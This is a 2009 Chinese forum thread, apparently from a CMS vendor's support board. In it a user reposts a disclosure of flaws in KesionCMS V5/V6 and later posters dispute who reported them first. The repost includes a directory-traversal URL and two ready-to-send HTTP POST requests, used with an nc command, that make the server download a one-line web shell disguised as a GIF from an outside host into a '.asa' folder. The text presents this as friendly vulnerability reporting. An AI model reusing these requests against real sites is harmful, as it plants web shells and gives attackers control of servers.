|
主题:[注意]在GOOGLE找到挂马操作及漏洞地址,不知有没帮助。。官方留意下。。。 [收藏主题] | 转到: |
在GOOGLE找到挂马操作及漏洞地址,不知有没帮助。。官方留意下。。。http://www.52niuren.com.cn/club/1.txt
以下是该网址Ctrl+C下来的内容
昨天空闲对官方的两个演示站检测了下,都拿下了, http://v6.kesion.com/KS_Data/test.asp http://www.kesion.cn/v55/ceshi.asp 绝无恶意...
V6.0后台的用户能够越级操作,建立目录,删除文件等。地址为(http://v6.kesion.com/admin/include/selectpic.asp?currpath=../.. 列目录)
奇怪的是对于V5这个列目录倒是禁止了(貌似有判断权限),但一个普通的管理用户同样可以拿到网站权限 远程下载保存图片也没有过滤文件类型,这点V6的演示站uploadfiles禁用脚本,而V5的竟然没有禁用 另外即使过滤了或者禁用,也可以通过修改构造数据包然后nc上传新建个.asa类型文件夹得到shell
注:科讯的前台还是很安全的,此次测试的前提条件是利用了演示版的普通管理员账号密码。因此在没有得到账号密码之前,科讯很安全O(∩_∩)O~
-------- 以下是本人构造的数据包,nc上传就行了,其中xinli.cpu.edu.cn/1.gif是本人放的一个测试文件一句话,自己可以打开看下 命令行:nc -vv webip 80<*.txt
V6版本===================================== POST /admin/Include/SaveBeyondfile.asp?action=save HTTP/1.1 ItemName=&wjj=%2FKS_Data%2FCollect%2F.asa%2f&http=http%3A%2F%2Fxinli.cpu.edu.cn%2F1.gif&Submit=%BF%AA%CA%BC%D7%A5%C8%A1
V5版本===================================== POST /v55/admin/Include/SaveBeyondfile.asp?action=save HTTP/1.1 ItemName=&wjj=%2Fv55%2FUpFiles%2Farticle%2Fkesion%2F200908%2F.asa%2F&http=http%3A%2F%2Fxinli.cpu.edu.cn%2F1.gif&Submit=%BF%AA%CA%BC%D7%A5%C8%A1
============================= 最后强调:友情检测,希望不要把偶当做恶意的捣蛋者。。 脚本小子类型,拿着别人的AK当拉登,基本html不懂,补不了漏洞才发给官方
|
|
支持(0) | 反对(0) 顶端 底部 |
以下是引用52niuren在2009-10-1 21:15:00的发言:
本来是好心私底下发给官方提醒的,既然有人搜索到了,为了证明自己 就只能截图为证,本人总共给官方发了四次消息: 楼主搜索到的是:http://www.52niuren.com.cn/club/display.asp?id=45 本人对脚本有点研究,这是刚用科讯学做站那阵子给科讯发的报告日期是8月25日
最底下的就是楼主搜索到的,8月25日给官方的消息,以下是消息内容:
在此次事件之前,本人的网站也被人攻击过了,因此又给官方发了三次消息提醒,就是上面截图的前两条消息,具体内容: 这一条给"科讯官方”发的:
这两条给“一生有你”版主发的:
(由于论坛限制只能发两条消息一天,偶只好又注册了个id:aiaiai给“一生有你”版主发信息)
同时昨天早上也在论坛发了提醒: http://bbs.kesion.com/dispbbs.asp?boardid=44&Id=97497 就是这一贴
============================================= PS:楼主发这一贴让人很受伤
重新申明...我也只是想官方尽快把漏洞补上才这么无聊在GG上搜...我也不知道52niuren之前有提过这个东西...最近都在忙少上论坛看贴...并没针对你及伤你心的意图... |
|
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
<上一主题 | 下一主题 > |